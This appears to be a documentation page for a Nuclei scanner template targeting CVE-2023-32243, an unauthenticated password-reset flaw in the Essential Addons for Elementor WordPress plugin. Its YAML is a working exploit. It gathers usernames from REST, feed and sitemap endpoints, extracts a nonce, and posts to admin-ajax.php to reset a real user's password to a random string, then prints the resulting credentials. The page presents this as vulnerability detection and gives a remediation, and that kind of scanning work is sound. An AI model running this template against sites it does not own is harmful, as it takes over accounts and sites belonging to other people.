WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset
ID: CVE-2023-32243
Severity: critical
Author: DhiyaneshDK,Vikas Kundu
Tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper
Description
Section titled “Description”Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
YAML Source
Section titled “YAML Source”id: CVE-2023-32243
info: name: WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset author: DhiyaneshDK,Vikas Kundu severity: critical description: | Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. impact: | An attacker can gain unauthorized access to user accounts and potentially take control of the affected WordPress website. remediation: | Update WordPress Elementor Lite plugin to the latest version (5.7.2) or apply the patch provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-32243 - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ - https://patchstack.com/database/vulnerability/essential-addons-for-elementor-lite/wordpress-essential-addons-for-elementor-plugin-5-4-0-5-7-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 epss-score: 0.08653 epss-percentile: 0.94489 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 6 vendor: wpdeveloper product: essential_addons_for_elementor framework: wordpress google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper
http: - raw: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-json/wp/v2/users/ HTTP/1.1 Host: {{Hostname}} - | GET /?rest_route=/wp/v2/users HTTP/1.1 Host: {{Hostname}} - | GET /feed/ HTTP/1.1 Host: {{Hostname}} - | GET /author-sitemap.xml HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}
payloads: password: - "{{randstr}}" host-redirects: true max-redirects: 2 stop-at-first-match: true matchers: - type: word part: body_6 words: - '"success":true' - '"data":' condition: and
extractors: - type: regex name: nonce part: body_1 group: 1 regex: - 'nonce":"([0-9a-z]+)' internal: true
- type: json part: body name: wordpress_username group: 1 json: - '.[] | .slug' - '.[].name' internal: true
- type: regex part: body_4 name: wordpress_username group: 1 regex: - '<dc:creator><!\[CDATA\[([A-Za-z]+)\]\]><\/dc:creator>' internal: true
- type: regex part: body_5 name: wordpress_username group: 1 regex: - '\/author\/([a-z-]+)\/' internal: true
- type: dsl dsl: - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password'# digest: 4b0a00483046022100afbd7edf3f446438348f874d31828e18547e083272383faf36f304ac90eec657022100a9f5b3a652cc7df75326ee68024f87517e9ea4969b604f2f73b5d52f7468dec5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32243.yaml"